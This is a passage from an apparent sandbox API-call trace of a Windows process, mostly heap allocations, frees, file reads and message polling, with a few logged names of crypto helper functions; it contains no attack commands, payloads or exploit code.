0x9bd4c8 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.256] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.256] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa550, lpOverlapped=0x0) returned 1 [0199.258] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa550) returned 0xbea018 [0199.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa550) returned 0xbf4570 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa550) returned 0xbea018 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.261] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.261] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.261] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0199.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa550) returned 0xbea018 [0199.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0199.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa550) returned 0xbfeac8 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.263] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0199.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0199.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.263] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.264] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.264] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.265] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0199.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.266] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0199.267] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.268] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 